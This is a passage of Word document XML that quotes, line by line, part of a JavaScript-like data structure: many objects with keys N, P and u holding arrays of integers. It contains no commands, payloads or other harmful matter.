    <w:p w14:paraId="2A086D9C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2061B312" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F7242" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546F3B12" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3A0D5C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F6AE0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053CECB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A311D28" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79387872" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0671A35B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509489F0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C98A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8F7B0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42FD9E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [22]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0878B4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660B7737" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E97369" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD7BB3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757F8C31" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393231E8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B15FBB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 7, 8, 9, 10, 11, 13, 14, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B26998" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 6, 12, 19, 26, 40, 51, 58, 70, 75, 86, 87, 90, 102, 129, 130, 141, 169, 192, 206, 211, 231, 249, 251, 253, 274, 282, 286, 344, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2789ABD6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6791EC62" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64265BEB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 14, 15, 19, 20, 21, 22, 31, 34, 36, 37],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA12AED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 12, 13, 16, 17, 18, 23, 24, 25, 26, 27, 28, 29, 30, 32, 33, 35, 159, 245, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F896CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BDDBA4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9FD9A7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6DA28C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6801CE9E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286063AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DCF3B7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7E5D5D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [254, 276]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D0A73B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AC5263" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E14C2C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 8, 12, 13, 14, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B341445" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [0, 1, 3, 4, 5, 6, 7, 9, 10, 11, 193]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FA5E35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFCC124" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7, 0, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8A4A29" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4BD6B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [193]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61782F4C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABB5F22" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D841A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1001B0BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 21, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE60D97" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A425E9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4F1D22" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D71BF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 14, 18, 22]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A1A8C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D45520" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD27203" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6C9835" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A180F28" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780A4C91" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E284B1D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD67BDE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015AAF72" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0959F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CC4EDC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFA513B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0B3E0C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10, 13, 14, 306]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C57FE44" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C2617B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A225903" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BDC42C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [14, 23, 27, 40, 71, 108, 134, 140, 200, 219, 232, 249, 260, 277, 282, 283, 298, 303, 319, 343, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051B9E09" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8A6EC7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC881EA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432CBBA2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26271696" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449A3F13" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7299C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0382A4B7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5BB26" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F198342" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CD6EBE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E3AED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 18, 21, 22, 23, 24, 33, 35, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C77004" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C20FBBB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2, 3, 1, 5, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08660A35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA23B7D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D11901" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B91919" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304B6D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E71905" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB7902A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F224957" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21645D48" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B625C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D916AD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7147A79D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F617C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFB6DA2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9C41A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD51AFF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 27, 16, 17, 30, 21],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7984BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 37],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE5901C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [24, 36, 76, 123, 132, 156, 159, 166, 196, 204, 287, 291, 295, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD67963" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FB7E23" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623073E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D99930" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 18, 25, 89, 128]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED67ABD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252F7642" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D89466" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C1DF67" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A43DCD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE38A9C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4951CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 4, 5, 6, 7, 9, 10, 11, 12, 14, 15, 16, 17, 19, 20, 21, 23, 24, 25, 27, 28],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D3D1C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 3, 8, 13, 18, 22, 26, 32, 159, 166, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E22C05E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663A9529" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70793CE1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76216EA8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [12, 146, 161, 187, 189, 229, 247, 273, 290, 309]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9F2B06" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24427919" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252C678F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338DAA9F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16, 20, 31]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD76F26" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCFF964" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3, 4, 1, 21, 18, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F6371" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B6D865" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [67, 124, 131, 159, 183, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298555D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
